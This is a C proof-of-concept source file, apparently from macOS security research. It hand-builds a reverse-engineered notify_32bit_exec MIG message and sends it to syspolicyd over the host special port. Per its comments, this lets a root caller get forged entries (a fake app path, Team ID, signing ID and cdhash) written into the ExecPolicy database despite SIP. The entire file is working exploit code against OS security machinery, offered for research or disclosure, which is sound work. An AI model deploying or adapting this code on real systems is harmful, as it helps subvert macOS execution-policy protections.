Example of sending a notify_32bit_exec MIG message to syspolicyd
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/mach_error.h>
/*
 * Proof of concept: send a hand-built notify_32bit_exec MIG message to
 * syspolicyd. This lets an already privileged caller (root, since the
 * host_priv port is needed) get entries written into
 * /var/db/SystemPolicyConfiguration/ExecPolicy even with SIP enabled:
 * syspolicyd stores the values it is handed in the ExecPolicy database
 * before it decides whether they can actually be verified.
 *
 * The message id (0x48a8) and the field layout below are reverse-engineered,
 * not a public interface, so they may differ between macOS builds.
 *
 * Passing in a real application still produces errors, e.g.:
 * default 08:22:28.588787 -0500 trustd asynchronously fetching CRL (http://crl.apple.com/root.crl) for client (syspolicyd[1977]/0#-1 LF=0)
 * default 08:22:28.617267 -0500 syspolicyd -[LSCodeEvaluationClientManager handlePromptResponse:info:identifier:]: response: 2 info: <private>
 * error 08:22:28.617885 -0500 syspolicyd failed to call driver: 0x3
 */
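/*
 * Sizes of the fixed-length payload buffers in the notify_32bit_exec message.
 * The wire layout was recovered by reverse engineering, so these are the
 * sizes syspolicyd appears to expect, not values we are free to change.
 */
enum {
    MSG_PATH_LEN = 1024,      /* on-disk path of the executable */
    MSG_TEAM_ID_LEN = 64,     /* code-signing Team ID */
    MSG_SIGNING_ID_LEN = 128, /* code-signing identifier (bundle-id style) */
    MSG_CDHASH_LEN = 20       /* raw code directory hash */
};

/*
 * Raw MIG request for msgh_id 0x48a8 (notify_32bit_exec) as sent to
 * syspolicyd's host special port. main() fills it field by field and hands
 * the whole struct to mach_msg(), so the layout is the wire format.
 *
 * Every member is a 32-bit scalar or a char array, so no padding is expected
 * between fields (uid_t/pid_t are 32-bit on Darwin — TODO confirm if this is
 * ever built elsewhere).
 *
 * The u1..u6 members are of unknown purpose; main() sets u2 = 1 and the rest
 * to 0. Each *_size field holds the size of the buffer that follows it, not
 * the length of the string stored in it.
 */
struct message {
    mach_msg_header_t hdr;
    uint32_t u1;                           /* unknown; 0 */
    uint32_t u2;                           /* unknown; 1 */
    uint32_t eval_id;                      /* evaluation id; main() uses 2 */
    uint32_t u3;                           /* unknown; 0 */
    uid_t uid;                             /* uid the execution is attributed to */
    pid_t pid;                             /* pid the execution is attributed to */
    uint32_t u4;                           /* unknown; 0 */
    uint32_t path_size;                    /* sizeof path */
    char path[MSG_PATH_LEN];               /* NUL-terminated, zero-padded */
    uint32_t u5;                           /* unknown; 0 */
    uint32_t team_id_size;                 /* sizeof team_id */
    char team_id[MSG_TEAM_ID_LEN];         /* NUL-terminated, zero-padded */
    uint32_t u6;                           /* unknown; 0 */
    uint32_t signing_id_size;              /* sizeof signing_id */
    char signing_id[MSG_SIGNING_ID_LEN];   /* NUL-terminated, zero-padded */
    char cdhash[MSG_CDHASH_LEN];           /* binary, no terminator or size field */
};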
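/*
 * Build one notify_32bit_exec request for a fake bundle and send it to
 * syspolicyd over its host special port.
 *
 * Preconditions: host_get_host_priv_port() only succeeds for a privileged
 * task, so in practice this must run as root.
 *
 * argc/argv are unused; the path, Team ID, signing id and cdhash are
 * hard-coded test values.
 *
 * Returns 0 once mach_msg() reports the message was queued, EXIT_FAILURE
 * (with a diagnostic on stderr) if any port lookup or the send fails.
 */
int
main(int argc, char *argv[])
{
    /* Reverse-engineered msgh_id of syspolicyd's notify_32bit_exec routine. */
    enum { NOTIFY_32BIT_EXEC_MSG_ID = 0x48a8 };

    /* cdhash of the fake bundle: 20 raw bytes, so it is copied with memcpy()
     * rather than a string function. */
    static const unsigned char fake_cdhash[] = {
        0xd7, 0x4a, 0x6b, 0x33, 0x0a, 0x8c, 0x67, 0xc4, 0x8f, 0xc0,
        0xf8, 0xbb, 0xc7, 0xe0, 0xdc, 0x46, 0x55, 0xe2, 0x44, 0xb8
    };

    kern_return_t kr;
    mach_port_t host;
    mach_port_t host_priv;
    mach_port_t asp_port;
    /* Zero every byte up front so the string buffers stay zero-padded and
     * nothing uninitialised leaves the process. */
    struct message msg = {0};

    (void)argc;
    (void)argv;

    _Static_assert(sizeof fake_cdhash == sizeof msg.cdhash,
                   "cdhash literal must match the message field size");

    /* Privileged host port: required to look up host special ports. */
    host = mach_host_self();
    kr = host_get_host_priv_port(host, &host_priv);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "host_get_host_priv_port: %s (0x%x)\n",
                mach_error_string(kr), (unsigned)kr);
        return EXIT_FAILURE;
    }

    /* A send right to syspolicyd's MIG server. */
    kr = host_get_special_port(host_priv, HOST_LOCAL_NODE,
                               HOST_SYSPOLICYD_PORT, &asp_port);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "host_get_special_port(HOST_SYSPOLICYD_PORT): %s (0x%x)\n",
                mach_error_string(kr), (unsigned)kr);
        return EXIT_FAILURE;
    }

    /* Header. MOVE_SEND hands our only send right to the kernel as part of
     * the send, so asp_port must not be used after mach_msg() returns. No
     * reply port is supplied: this is one-way. */
    msg.hdr.msgh_bits = MACH_MSGH_BITS_REMOTE(MACH_MSG_TYPE_MOVE_SEND);
    msg.hdr.msgh_size = sizeof msg;
    msg.hdr.msgh_remote_port = asp_port;
    msg.hdr.msgh_local_port = MACH_PORT_NULL;
    msg.hdr.msgh_voucher_port = MACH_PORT_NULL;
    msg.hdr.msgh_id = NOTIFY_32BIT_EXEC_MSG_ID;

    /* Fixed fields. u1..u6 are of unknown meaning; these are the values the
     * original PoC used. uid 502 and pid 1 are likewise hard-coded test
     * values (pid 1 is launchd). */
    msg.u1 = 0;
    msg.u2 = 1;
    msg.eval_id = 2;
    msg.u3 = 0;
    msg.uid = 502;
    msg.pid = 1;
    msg.u4 = 0;

    /* Each string is preceded by its buffer size, not its strlen. snprintf()
     * always NUL-terminates; the remainder of each buffer is already zero. */
    msg.path_size = sizeof msg.path;
    snprintf(msg.path, sizeof msg.path, "%s", "/Applications/FakeApp.app");
    msg.u5 = 0;
    msg.team_id_size = sizeof msg.team_id;
    snprintf(msg.team_id, sizeof msg.team_id, "%s", "ABCDEFGHIJ");
    msg.u6 = 0;
    msg.signing_id_size = sizeof msg.signing_id;
    snprintf(msg.signing_id, sizeof msg.signing_id, "%s", "com.fake.bundle.Id");
    memcpy(msg.cdhash, fake_cdhash, sizeof msg.cdhash);

    /* Send only; no receive buffer, no timeout. */
    kr = mach_msg(&msg.hdr,
                  MACH_SEND_MSG,
                  sizeof msg,
                  0,
                  MACH_PORT_NULL,
                  MACH_MSG_TIMEOUT_NONE,
                  MACH_PORT_NULL);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "mach_msg: %s (0x%x)\n",
                mach_error_string(kr), (unsigned)kr);
        return EXIT_FAILURE;
    }

    return 0;
}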